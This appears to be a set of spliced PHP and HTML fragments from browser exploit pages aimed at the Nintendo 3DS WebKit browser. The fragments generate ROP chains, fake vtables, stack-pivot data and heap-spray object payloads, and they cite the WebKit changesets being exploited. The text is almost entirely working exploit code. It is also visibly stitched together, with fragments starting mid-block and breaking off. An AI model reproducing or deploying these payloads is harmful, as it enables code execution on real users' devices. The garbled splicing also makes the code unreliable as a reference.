function ropchain_appendu32($val) { global $ROPCHAIN, $generatebinrop; if ($generatebinrop == 0) { $ROPCHAIN .= genu32_unicode($val); } else { $ROPCHAIN .= pack("N*", $val); } }
$OBJECTDATA_OVERWRITE = "\""; $loopcnt = 0; for ($i = 0; $i < 0x7c; $i += 4) { if ($i == 0) { $OBJECTDATA_OVERWRITE .= genu32_unicode($VTABLEPTR); } else { if ($loopcnt == 0) { $OBJECTDATA_OVERWRITE .= genu32_unicode($STACKPTR_ADR); } //stack ptr if ($loopcnt == 1) { $OBJECTDATA_OVERWRITE .= genu32_unicode($POPPC); } //lr, and in some cases pc. if ($loopcnt == 2) { $OBJECTDATA_OVERWRITE .= genu32_unicode($POPPC); } //pc $loopcnt++; if ($loopcnt > 2) { $loopcnt = 0; } } } $OBJECTDATA_OVERWRITE .= "\""; generate_ropchain(); ?> <!DOCTYPE html> <body> <script> var form1;
} $OBJECTDATA_OVERWRITE .= "\""; //$OBJECTDATA_OVERWRITE = "\"\u6004\u08b6\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\""; generate_ropchain(); $tag = hash("sha256", $_SERVER['SCRIPT_NAME'], true); $OBJECTDATA_PADDING = "\"" . genu32_unicode(0xf7f7f7f0); $OBJECTDATA_PADDING .= genu32_unicode(0xf7f7f7f7); $OBJECTDATA_PADDING .= genu32_unicode(0xf7f7f7f7); $OBJECTDATA_PADDING .= genu32_unicode(0xf7f7f7f7); $OBJECTDATA_PADDING .= genu32_unicode(0xf7f7f7f7); for ($i = 0; $i < 2; $i++) { for ($hashi = 0; $hashi < 0x20; $hashi += 4) { $OBJECTDATA_PADDING .= genu32_unicode(ord($tag[$hashi]) | ord($tag[$hashi + 1]) << 8 | ord($tag[$hashi + 2]) << 16 | ord($tag[$hashi + 1]) << 24); } } $OBJECTDATA_PADDING .= genu32_unicode(0xf4f7f7f7) . "\""; ?> <html> <head> <script language="JavaScript"> //http://trac.webkit.org/changeset/158724 var haxstr0 = new Array(); var haxstr1 = new Array(); var longobjstr = ""; obj = new Array(); function create_input() { for(i=0; i<0x1000; i++) {
$i += 3; } } $STACKPIVOTDATA .= genu32_unicode($STACKPTR_ADR); //padding $STACKPIVOTDATA .= "\""; generate_ropchain(); $VTABLEDATA = "\""; for ($i = 0; $i < 0x110 - 0x20 >> 2; $i++) { $VTABLEDATA .= genu32_unicode($STACKPIVOTDATA_ADR); } $tag = hash("sha256", $_SERVER['SCRIPT_NAME'], true); for ($hashi = 0; $hashi < 0x20; $hashi += 4) { $VTABLEDATA .= genu32_unicode(ord($tag[$hashi]) | ord($tag[$hashi + 1]) << 8 | ord($tag[$hashi + 2]) << 16 | ord($tag[$hashi + 1]) << 24); } $VTABLEDATA .= genu32_unicode($VTABLE_JUMPADR); $VTABLEDATA .= "\""; ?> <html> <head> <style> body {color:blue;background:black;} iframe {display:none;} h1 {text-align:center;} </style> <script> //This haxx is only for the new3ds browser atm, based on this: http://pastebin.com/ufBCQKda heapsetup(); if(parent==window) {
} $OBJECTDATA_OVERWRITE .= "\""; $OBJDATAPAYLOAD = "\""; for ($j = 0; $j < 0x8000; $j += 0x40) { for ($i = 0; $i < 0x40; $i += 4) { if ($i == 0x34) { $OBJDATAPAYLOAD .= genu32_unicode($OBJDATAPAYLOAD_ADDR + 4); //Addr of the object used when doing the vtable funcptr call with vtable +0x5c. } else { if ($i < 0x34 && $i != 0x0) { $OBJDATAPAYLOAD .= genu32_unicode($VTABLEPTR); } else { if ($i == 0x38) { $OBJDATAPAYLOAD .= genu32_unicode($STACKPTR_ADR); } else { $OBJDATAPAYLOAD .= genu32_unicode($POPPC); } } } } } $OBJDATAPAYLOAD .= "\""; generate_ropchain(); ?> <!DOCTYPE html> <html> <body><div><script> //https://trac.webkit.org/changeset/106972 obj = new Array(); objdatapayload = new Array();